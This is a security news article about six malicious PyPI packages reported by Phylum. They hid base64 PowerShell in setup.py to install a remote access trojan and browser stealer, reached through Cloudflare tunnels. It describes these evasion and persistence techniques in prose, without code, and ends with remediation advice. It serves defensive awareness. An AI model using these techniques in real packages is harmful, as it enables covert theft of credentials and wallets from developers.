PyPi malicious packages created CloudFlare Tunnels to bypass firewalls

The Python Package Index, or PyPI, continues to surprise and not in a good way.

Ideally a source of Python libraries that developers can include in their projects to save time, PyPI has again been caught hosting packages with live Amazon Web Services (AWS) keys and data-stealing malware. Six Malicious packages have been found on PyPI, the Python Package Index, while using Cloudflare tunnel to get over firewall constraints for remote access while also installing data- stealing and RAT (remote access trojan) malware.

The six packages were found by the Phylum research team, and the first malicious extensions appeared on the package repository on December 22 and last on 31,2022.

These are the six malicious packages that Phylum detected are the following:

  • pyrologin – 165 downloads
  • easy timestamp – 141 downloads
  • discorder – 83 downloads
  • discord-dev – 228 downloads
  • py – 193 downloads
  • python styles – 130 downloads

The Malicious packages try to run shell commands, collect typed information, and steal sensitive user data stored in browsers.

Now, all of the packages have been removed from PyPI, but those who downloaded them will have to manually uninstall.

 

PowerShell Script Packages Allow For Remote Control

The installer (setup.py) on these files contains a base64-encoded string that decodes to a PowerShell script. This script sets the ‘-ErrorAction SilentlyContinue’ flag so that the script will silently continue, even if it runs into errors (to avoid detection by developers).

The PowerShell script will download a ZIP file, unzip it in a local temporary directory, and then install a series of dependencies and extra Python packages that allow for remote control and screenshot taking.

The packages “flask” and “flask_cloudflared” are silently installed at that phase as well. The packages are also capable of stealing the cookies, saved passwords, and cryptocurrency wallet data from Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, Opera GX, and Vivaldi browsers.

 

Access To Cloudflare Without Setting Up Firewalls

The script now runs “cftunnel.py,” also included in the ZIP archive, that is used to install a Cloudflare tunnel client on the victim’s machine.

Cloudflare Tunnel is a service offering that allows customers, even free accounts, to create a bidirectional tunnel from a server directly to the Cloudflare infrastructure.

This connection allows web servers to quickly become publicly available through Cloudflare without configuring firewalls, opening ports, or dealing with other routing issues.The threat actors use this tunnel to remotely access a remote access trojan running on the infected device as the ‘Flask’ script, even if a firewall protects that device.

 

Remediation
It is strongly recommended that following remediation steps need to be performed:

  • Continuously monitoring with threat feeds and removing identified malicious packages from the system or source code.
  • Next Gen AV’s and Security Solutions need to be implemented within the organization.
  • Reset passwords using strict password policies.
  • Continuous Open Source security testing and source code review needs to be performed to prevent further cyber attacks.

Security Events logging and monitoring should be implemented and managed properly